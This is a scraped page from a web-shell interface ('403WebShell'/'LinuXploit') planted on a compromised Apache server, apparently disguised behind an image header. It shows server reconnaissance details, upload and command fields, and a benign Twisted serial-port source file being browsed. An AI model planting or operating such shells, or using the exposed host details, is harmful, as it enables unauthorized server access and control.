����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 18.221.40.13
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/usr/lib/python3/dist-packages/twisted/internet/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/lib/python3/dist-packages/twisted/internet/_win32serialport.py
# -*- test-case-name: twisted.internet.test.test_win32serialport -*-

# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Serial port support for Windows.

Requires PySerial and pywin32.
"""

from __future__ import division, absolute_import

# system imports
from serial import PARITY_NONE
from serial import STOPBITS_ONE
from serial import EIGHTBITS
from serial.serialutil import to_bytes
import win32file, win32event

# twisted imports
from twisted.internet import abstract

# sibling imports
from twisted.internet.serialport import BaseSerialPort


class SerialPort(BaseSerialPort, abstract.FileDescriptor):
    """
    A serial device, acting as a transport, built on win32 overlapped I/O.

    Two win32 event objects (one for reads, one for writes) are registered
    with the reactor through C{addEvent}, under the method names
    C{'serialReadEvent'} and C{'serialWriteEvent'}.

    @ivar outQueue: data passed to L{write} while an earlier write was still
        in progress, in the order it was submitted.
    @ivar writeInProgress: true from the moment a write has been handed to
        C{WriteFile} until L{serialWriteEvent} finds C{outQueue} empty.
    @ivar read_buf: the buffer given to the currently pending one-byte
        overlapped read.
    """

    connected = 1

    def __init__(self, protocol, deviceNameOrPortNumber, reactor,
                 baudrate=9600, bytesize=EIGHTBITS, parity=PARITY_NONE,
                 stopbits=STOPBITS_ONE, xonxoff=0, rtscts=0):
        """
        Open the port, hook its events into the reactor and connect the
        protocol.

        @param protocol: the protocol to attach; C{makeConnection(self)} is
            called on it once the events are registered.
        @param deviceNameOrPortNumber: forwarded unchanged to
            C{self._serialFactory} (not defined in this class; presumably
            supplied by L{BaseSerialPort}).
        @param reactor: an object providing C{addEvent} and C{removeEvent}.
        @param baudrate: forwarded to C{self._serialFactory}.
        @param bytesize: forwarded to C{self._serialFactory}.
        @param parity: forwarded to C{self._serialFactory}.
        @param stopbits: forwarded to C{self._serialFactory}.
        @param xonxoff: forwarded to C{self._serialFactory}.
        @param rtscts: forwarded to C{self._serialFactory}.
        """
        portOptions = {
            'baudrate': baudrate,
            'bytesize': bytesize,
            'parity': parity,
            'stopbits': stopbits,
            'timeout': None,
            'xonxoff': xonxoff,
            'rtscts': rtscts,
        }
        self._serial = self._serialFactory(deviceNameOrPortNumber,
                                           **portOptions)
        self.flushInput()
        self.flushOutput()

        self.reactor = reactor
        self.protocol = protocol
        self.outQueue = []
        self.closed = 0
        self.closedNotifies = 0
        self.writeInProgress = 0

        # Read side: the event is created manual-reset (second argument 1),
        # which is why serialReadEvent resets it explicitly.
        readOverlapped = win32file.OVERLAPPED()
        readOverlapped.hEvent = win32event.CreateEvent(None, 1, 0, None)
        self._overlappedRead = readOverlapped

        # Write side: the event is created auto-reset (second argument 0).
        writeOverlapped = win32file.OVERLAPPED()
        writeOverlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
        self._overlappedWrite = writeOverlapped

        eventHandlers = (
            (self._overlappedRead, 'serialReadEvent'),
            (self._overlappedWrite, 'serialWriteEvent'),
        )
        for overlapped, handlerName in eventHandlers:
            self.reactor.addEvent(overlapped.hEvent, self, handlerName)

        self.protocol.makeConnection(self)
        self._finishPortSetup()


    def _finishPortSetup(self):
        """
        Complete port initialisation by queueing the first overlapped read.

        Kept apart from C{__init__} so that tests can replace it.
        """
        # The returned values are not used here; only the call itself matters.
        _flags, _comstat = self._clearCommError()
        portHandle = self._serial._port_handle
        oneByteBuffer = win32file.AllocateReadBuffer(1)
        _rc, self.read_buf = win32file.ReadFile(
            portHandle, oneByteBuffer, self._overlappedRead)


    def _clearCommError(self):
        """
        Call C{win32file.ClearCommError} on the port handle.

        @return: whatever C{ClearCommError} returns; callers in this class
            unpack it as a C{(flags, comstat)} pair.
        """
        portHandle = self._serial._port_handle
        return win32file.ClearCommError(portHandle)


    def serialReadEvent(self):
        """
        Handle completion of the pending one-byte read.

        Collects that byte, reads whatever the driver reports as already
        queued, delivers everything to the protocol in a single
        C{dataReceived} call, and then queues the next one-byte read.
        """
        # Fetch the result of the read that was set up earlier (no waiting).
        count = win32file.GetOverlappedResult(
            self._serial._port_handle, self._overlappedRead, 0)
        received = to_bytes(self.read_buf[:count])

        # Pick up everything that is already sitting in the input queue.
        _flags, status = self._clearCommError()
        if status.cbInQue:
            win32event.ResetEvent(self._overlappedRead.hEvent)
            _rc, extra = win32file.ReadFile(
                self._serial._port_handle,
                win32file.AllocateReadBuffer(status.cbInQue),
                self._overlappedRead)
            # Last argument 1: wait for this read to finish.
            count = win32file.GetOverlappedResult(
                self._serial._port_handle, self._overlappedRead, 1)
            received = received + to_bytes(extra[:count])

        self.protocol.dataReceived(received)

        # Queue the next one-byte read. The port handle is looked up again
        # rather than cached, since dataReceived runs arbitrary protocol code.
        win32event.ResetEvent(self._overlappedRead.hEvent)
        _rc, self.read_buf = win32file.ReadFile(
            self._serial._port_handle,
            win32file.AllocateReadBuffer(1),
            self._overlappedRead)


    def write(self, data):
        """
        Send C{data} to the port, or queue it if a write is still in
        progress.

        @param data: the data to write; a false value (e.g. empty) is
            ignored.
        """
        if not data:
            return
        if self.writeInProgress:
            # Sent later from serialWriteEvent.
            self.outQueue.append(data)
            return
        self.writeInProgress = 1
        win32file.WriteFile(
            self._serial._port_handle, data, self._overlappedWrite)


    def serialWriteEvent(self):
        """
        Handle the write event: send the next queued chunk, or clear
        C{writeInProgress} when nothing is left to send.
        """
        if not self.outQueue:
            self.writeInProgress = 0
            return
        nextChunk = self.outQueue.pop(0)
        win32file.WriteFile(
            self._serial._port_handle, nextChunk, self._overlappedWrite)


    def connectionLost(self, reason):
        """
        Called when the serial port disconnects.

        Removes both events from the reactor, runs the
        L{abstract.FileDescriptor} teardown, closes the underlying serial
        object and finally calls C{connectionLost} on the protocol that is
        handling the serial data.

        @param reason: passed through to
            C{abstract.FileDescriptor.connectionLost} and to the protocol.
        """
        readEvent = self._overlappedRead.hEvent
        self.reactor.removeEvent(readEvent)
        writeEvent = self._overlappedWrite.hEvent
        self.reactor.removeEvent(writeEvent)
        abstract.FileDescriptor.connectionLost(self, reason)
        self._serial.close()
        self.protocol.connectionLost(reason)

Youez - 2016 - github.com/yon3zu
LinuXploit